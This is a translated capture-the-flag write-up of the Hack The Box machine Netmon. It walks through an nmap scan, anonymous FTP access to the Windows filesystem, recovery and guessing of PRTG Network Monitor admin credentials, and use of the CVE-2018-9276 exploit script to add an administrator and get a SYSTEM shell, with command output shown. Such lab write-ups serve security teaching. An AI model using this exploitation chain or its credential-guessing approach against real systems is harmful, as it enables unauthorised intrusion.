This post was originally written in Spanish and translated into English using a large language model (LLM). Although the translation has been reviewed, it may contain inaccuracies or inconsistencies.
Description
On Netmon, we see how critical a misconfigured FTP server can be when it exposes system files such as configuration backups and documents. We recover credentials for the target web application from a configuration file and exploit the public vulnerability CVE-2018-9276, obtaining RCE by adding an administrator account to the system.
nmap -sCV -p 21,80,135,139,445,5985,47001,49664,49665,49666,49667,49668,49669 -oN Objetivos 10.10.10.152 Nmap scan report for 10.10.10.152 Host is up (0.052s latency).
PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-anon: Anonymous FTP login allowed (FTP code 230) | 02-03-19 12:18AM 1024 .rnd | 02-25-19 10:15PM <DIR> inetpub | 07-16-16 09:18AM <DIR> PerfLogs | 02-25-19 10:56PM <DIR> Program Files | 02-03-19 12:28AM <DIR> Program Files (x86) | 02-03-19 08:08AM <DIR> Users |_02-25-19 11:49PM <DIR> Windows | ftp-syst: |_ SYST: Windows_NT 80/tcp open http Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor) |_http-trane-info: Problem with XML parsing of /evox/about |_http-server-header: PRTG/18.1.37.13946 | http-title: Welcome | PRTG Network Monitor (NETMON) |_Requested resource was /index.htm 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results: | smb-security-mode: | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-time: | date: 2022-07-11T01:08:35 |_ start_date: 2022-07-10T19:01:19 | smb2-security-mode: | 3.1.1: |_ Message signing enabled but not required
Observations
FTP allows login with anonymous:anonymous, and the output indicates that we can access the entire Windows filesystem.
Port 80 also hosts a web server.
Web Reconnaissance
The website at 10.10.10.152:80 displays a login page for an application named PRTG NETWORK MONITOR.
The page source reveals the application version: 'appVersion':'18.1.37.13946'.
An RCE vulnerability exists for version 18.2.38. The server is running 18.1.37.13946, so it should theoretically be affected. Exploitation requires authentication, so we need credentials. We can search the FTP server in case a configuration file contains plaintext credentials.
Exploitation
Finding Valid Credentials
Path Used by PRTG
Because we can access FTP with anonymous:anonymos, we can investigate where PRTG NETWORK MONITOR stores its default credentials and look for files containing hard-coded credentials.
A web search reveals that PRTG Network Monitor uses /ProgramData/Paessler/PRTG Network Monitor, so let us inspect it.
The files contain too many lines to review manually, so we need to filter their contents. A quick web search shows that the default administrator account is prtgadmin.
Excellent! We appear to have valid credentials, prtgadmin:PrTg@dmin2018, with which to access the panel and exploit the RCE.
Validating the Credentials
The credentials do not work. That is strange. The backup may be from a previous year, and perhaps the administrator reuses the same password while changing the year. We try PrTg@dmin2019.
Boom! The credentials are valid, so we can exploit the vulnerability identified earlier.
Exploiting the Vulnerability
The vulnerability is CVE-2018-9276. We use the provided 46527.sh script.
# Login To The App, Default Creds Are Prtgadmin/Prtgadmin. Once Athenticated Grab Your Cookie And Use It With The Script. # Run The Script To Create A New User 'Void4m0n' In The Administrators Group With Password 'Hacked'
# Login To The App, Default Creds Are Prtgadmin/Prtgadmin. Once Athenticated Grab Your Cookie And Use It With The Script. # Run The Script To Create A New User 'Pentest' In The Administrators Group With Password 'P3nt3st!'
Password: [*] Requesting shares on 10.10.10.152..... [*] Found writable share ADMIN$ [*] Uploading file MAyGnnAc.exe [*] Opening SVCManager on 10.10.10.152..... [*] Creating service PBCl on 10.10.10.152..... [*] Starting service PBCl..... [!] Press help for extra shell commands Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami nt authority\system
We have compromised the machine; all that remains is to find the flags.
Flags
User.txt
This flag does not require exploiting the vulnerability. We simply connect to FTP with anonymous:anonymous and download user.txt.